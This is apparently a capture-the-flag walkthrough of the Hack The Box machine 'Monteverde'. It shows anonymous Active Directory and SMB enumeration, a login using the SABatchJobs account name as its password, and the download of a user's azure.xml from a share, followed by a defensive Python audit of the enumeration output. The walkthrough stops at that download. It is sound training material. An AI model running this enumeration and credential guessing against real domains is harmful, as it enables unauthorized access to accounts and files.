HTB Monteverde Walkthrough
HTB Monteverde Walkthrough (nanobyte)
```
nmap -sV -sC -p- -oA monteverde.nmap 10.10.10.172
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-30 08:08 CST
Nmap scan report for 10.10.10.172
Host is up (0.043s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-01-30 14:20:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49771/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/30%Time=5E32E3C7%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 9m58s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-01-30T14:22:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 380.55 seconds
```

```
enum4linux -a 10.10.10.172
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jan 30 08:17:35 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.172
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.172    |
 ==================================================== 
[E] Can't find workgroup/domain

 ============================================ 
|    Nbtstat Information for 10.10.10.172    |
 ============================================ 
Looking up status of 10.10.10.172
No reply from 10.10.10.172

 ===================================== 
|    Session Check on 10.10.10.172    |
 ===================================== 
[+] Server 10.10.10.172 allows sessions using username '', password ''
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.10.172    |
 =========================================== 
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)

 ====================================== 
|    OS information on 10.10.10.172    |
 ====================================== 
[+] Got OS info for 10.10.10.172 from smbclient: 
[+] Got OS info for 10.10.10.172 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================= 
|    Users on 10.10.10.172    |
 ============================= 
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2    Name: AAD_987d7f2f57d2    Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos    Name: Dimitris Galanos    Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest    Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope    Name: Mike Hope    Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary    Name: Ray OLeary    Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs    Name: SABatchJobs    Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan    Name: Sally Morgan    Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata    Name: svc-ata    Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec    Name: svc-bexec    Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp    Name: svc-netapp    Desc: (null)

user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

 ========================================= 
|    Share Enumeration on 10.10.10.172    |
 ========================================= 

    Sharename       Type      Comment
    ---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.172

 ==================================================== 
|    Password Policy Information for 10.10.10.172    |
 ==================================================== 

[+] Attaching to 10.10.10.172 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

    [+] MEGABANK
    [+] Builtin

[+] Password Info for Domain: MEGABANK

    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000

        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0

    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7

 ============================== 
|    Groups on 10.10.10.172    |
 ============================== 

[+] Getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]

[+] Getting builtin group memberships:
Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group 'Users' (RID: 545) has member: Couldn't lookup SIDs
```

```
python samrdump.py 10.10.10.172
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Retrieving endpoint list from 10.10.10.172
Found domain(s):
 . MEGABANK
 . Builtin
[*] Looking up users in domain MEGABANK
Found user: Guest, uid = 501
Found user: AAD_987d7f2f57d2, uid = 1104
Found user: mhope, uid = 1601
Found user: SABatchJobs, uid = 2602
Found user: svc-ata, uid = 2603
Found user: svc-bexec, uid = 2604
Found user: svc-netapp, uid = 2605
Found user: dgalanos, uid = 2613
Found user: roleary, uid = 2614
Found user: smorgan, uid = 2615
Guest (501)/FullName: 
Guest (501)/UserComment: 
Guest (501)/PrimaryGroupId: 514
Guest (501)/BadPasswordCount: 0
Guest (501)/LogonCount: 0
Guest (501)/PasswordLastSet: <never>
Guest (501)/PasswordDoesNotExpire: True
Guest (501)/AccountIsDisabled: True
Guest (501)/ScriptPath: 
AAD_987d7f2f57d2 (1104)/FullName: AAD_987d7f2f57d2
AAD_987d7f2f57d2 (1104)/UserComment: 
AAD_987d7f2f57d2 (1104)/PrimaryGroupId: 513
AAD_987d7f2f57d2 (1104)/BadPasswordCount: 1
AAD_987d7f2f57d2 (1104)/LogonCount: 9
AAD_987d7f2f57d2 (1104)/PasswordLastSet: 2020-01-02 16:53:24.984897
AAD_987d7f2f57d2 (1104)/PasswordDoesNotExpire: True
AAD_987d7f2f57d2 (1104)/AccountIsDisabled: False
AAD_987d7f2f57d2 (1104)/ScriptPath: 
mhope (1601)/FullName: Mike Hope
mhope (1601)/UserComment: 
mhope (1601)/PrimaryGroupId: 513
mhope (1601)/BadPasswordCount: 0
mhope (1601)/LogonCount: 2
mhope (1601)/PasswordLastSet: 2020-01-02 17:40:05.908924
mhope (1601)/PasswordDoesNotExpire: True
mhope (1601)/AccountIsDisabled: False
mhope (1601)/ScriptPath: 
SABatchJobs (2602)/FullName: SABatchJobs
SABatchJobs (2602)/UserComment: 
SABatchJobs (2602)/PrimaryGroupId: 513
SABatchJobs (2602)/BadPasswordCount: 0
SABatchJobs (2602)/LogonCount: 0
SABatchJobs (2602)/PasswordLastSet: 2020-01-03 06:48:46.392235
SABatchJobs (2602)/PasswordDoesNotExpire: True
SABatchJobs (2602)/AccountIsDisabled: False
SABatchJobs (2602)/ScriptPath: 
svc-ata (2603)/FullName: svc-ata
svc-ata (2603)/UserComment: 
svc-ata (2603)/PrimaryGroupId: 513
svc-ata (2603)/BadPasswordCount: 0
svc-ata (2603)/LogonCount: 0
svc-ata (2603)/PasswordLastSet: 2020-01-03 06:58:31.332169
svc-ata (2603)/PasswordDoesNotExpire: True
svc-ata (2603)/AccountIsDisabled: False
svc-ata (2603)/ScriptPath: 
svc-bexec (2604)/FullName: svc-bexec
svc-bexec (2604)/UserComment: 
svc-bexec (2604)/PrimaryGroupId: 513
svc-bexec (2604)/BadPasswordCount: 0
svc-bexec (2604)/LogonCount: 0
svc-bexec (2604)/PasswordLastSet: 2020-01-03 06:59:55.863422
svc-bexec (2604)/PasswordDoesNotExpire: True
svc-bexec (2604)/AccountIsDisabled: False
svc-bexec (2604)/ScriptPath: 
svc-netapp (2605)/FullName: svc-netapp
svc-netapp (2605)/UserComment: 
svc-netapp (2605)/PrimaryGroupId: 513
svc-netapp (2605)/BadPasswordCount: 0
svc-netapp (2605)/LogonCount: 0
svc-netapp (2605)/PasswordLastSet: 2020-01-03 07:01:42.786264
svc-netapp (2605)/PasswordDoesNotExpire: True
svc-netapp (2605)/AccountIsDisabled: False
svc-netapp (2605)/ScriptPath: 
dgalanos (2613)/FullName: Dimitris Galanos
dgalanos (2613)/UserComment: 
dgalanos (2613)/PrimaryGroupId: 513
dgalanos (2613)/BadPasswordCount: 0
dgalanos (2613)/LogonCount: 0
dgalanos (2613)/PasswordLastSet: 2020-01-03 07:06:10.519660
dgalanos (2613)/PasswordDoesNotExpire: True
dgalanos (2613)/AccountIsDisabled: False
dgalanos (2613)/ScriptPath: 
roleary (2614)/FullName: Ray O'Leary
roleary (2614)/UserComment: 
roleary (2614)/PrimaryGroupId: 513
roleary (2614)/BadPasswordCount: 0
roleary (2614)/LogonCount: 0
roleary (2614)/PasswordLastSet: 2020-01-03 07:08:05.832167
roleary (2614)/PasswordDoesNotExpire: True
roleary (2614)/AccountIsDisabled: False
roleary (2614)/ScriptPath: 
smorgan (2615)/FullName: Sally Morgan
smorgan (2615)/UserComment: 
smorgan (2615)/PrimaryGroupId: 513
smorgan (2615)/BadPasswordCount: 0
smorgan (2615)/LogonCount: 0
smorgan (2615)/PasswordLastSet: 2020-01-03 07:09:21.629084
smorgan (2615)/PasswordDoesNotExpire: True
smorgan (2615)/AccountIsDisabled: False
smorgan (2615)/ScriptPath: 
[*] Received 10 entries.
```

```
rpcclient -U "MEGABANK\SABatchJobs" 10.10.10.172
Enter MEGABANK\SABatchJobs's password: SABatchJobs
rpcclient $>
```

```
rpcclient $> lookupnames mhope
mhope S-1-5-21-391775091-850290835-3566037492-1601 (User: 1)
rpcclient $> queryuser 1601
        User Name   :   mhope
        Full Name   :   Mike Hope
        Home Drive  :   \\monteverde\users$\mhope
        Dir Drive   :   H:
        Profile Path:
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Fri, 31 Jan 2020 10:18:59 CST
        Logoff Time              :      Wed, 31 Dec 1969 18:00:00 CST
        Kickoff Time             :      Wed, 13 Sep 30828 21:48:05 CDT
        Password last set Time   :      Thu, 02 Jan 2020 17:40:06 CST
        Password can change Time :      Fri, 03 Jan 2020 17:40:06 CST
        Password must change Time:      Wed, 13 Sep 30828 21:48:05 CDT
        unknown_2[0..31]...
        user_rid :      0x641
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000002
        padding1[0..7]...
        logon_hrs[0..21]...
```

```
smbclient \\\\10.10.10.172\\users$ -U MEGABANK/SABatchJobs
Enter MEGABANK\SABatchJobs's password: SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 07:12:48 2020
  ..                                  D        0  Fri Jan  3 07:12:48 2020
  dgalanos                            D        0  Fri Jan  3 07:12:30 2020
  mhope                               D        0  Fri Jan  3 07:41:18 2020
  roleary                             D        0  Fri Jan  3 07:10:30 2020
  smorgan                             D        0  Fri Jan  3 07:10:24 2020

                524031 blocks of size 4096. 519955 blocks available
```

```
smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 07:41:18 2020
  ..                                  D        0  Fri Jan  3 07:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 07:40:23 2020

                524031 blocks of size 4096. 519955 blocks available
```

```
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (7.1 KiloBytes/sec) (average 7.1 KiloBytes/sec)
```
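As an added example (not part of the original walkthrough), a small Python audit that parses the samrdump.py and enum4linux output formats shown above and flags, from the defender's side, the conditions this box exposed: enabled accounts whose passwords never expire or that have never logged on, and a domain policy with a short minimum length, complexity disabled and no lockout threshold. The sample records are constructed from the output above; the `min_length` baseline of 14 is an assumption.

```python
import re

# Constructed sample: a few records in the samrdump.py output format above.
SAMRDUMP_OUTPUT = """\
Guest (501)/LogonCount: 0
Guest (501)/PasswordDoesNotExpire: True
Guest (501)/AccountIsDisabled: True
AAD_987d7f2f57d2 (1104)/LogonCount: 9
AAD_987d7f2f57d2 (1104)/PasswordDoesNotExpire: True
AAD_987d7f2f57d2 (1104)/AccountIsDisabled: False
SABatchJobs (2602)/LogonCount: 0
SABatchJobs (2602)/PasswordDoesNotExpire: True
SABatchJobs (2602)/AccountIsDisabled: False
"""

# Constructed sample: lines from the enum4linux password-policy section above.
POLICY_OUTPUT = """\
    [+] Minimum password length: 7
        [+] Domain Password Complex: 0
    [+] Account Lockout Threshold: None
"""

RECORD = re.compile(r"^(\S+) \((\d+)\)/(\w+): ?(.*)$")

def parse_samrdump(text):
    """Group 'user (rid)/Field: value' lines into one dict per account."""
    users = {}
    for line in text.splitlines():
        m = RECORD.match(line)
        if m:
            name, rid, field, value = m.groups()
            users.setdefault(name, {"rid": int(rid)})[field] = value.strip()
    return users

def audit_accounts(users):
    """Enabled accounts with non-expiring passwords, and enabled accounts never used."""
    findings = []
    for name, u in users.items():
        if u.get("AccountIsDisabled") == "True":
            continue  # disabled accounts (Guest here) are not a live risk
        if u.get("PasswordDoesNotExpire") == "True":
            findings.append((name, "password never expires"))
        if u.get("LogonCount") == "0":
            findings.append((name, "enabled but never logged on"))
    return findings

def audit_policy(text, min_length=14):
    """Flag the policy weaknesses visible in the enum4linux output (baseline assumed)."""
    findings = []
    for line in text.splitlines():
        key, _, value = line.strip().lstrip("[+] ").partition(": ")
        if key == "Minimum password length" and int(value) < min_length:
            findings.append(f"minimum length {value} < {min_length}")
        elif key == "Domain Password Complex" and value == "0":
            findings.append("complexity requirement disabled")
        elif key == "Account Lockout Threshold" and value == "None":
            findings.append("no lockout threshold")
    return findings
```

Fed the full samrdump output from this box, every enabled account is flagged for a non-expiring password, and the four service accounts plus three staff accounts for never having logged on.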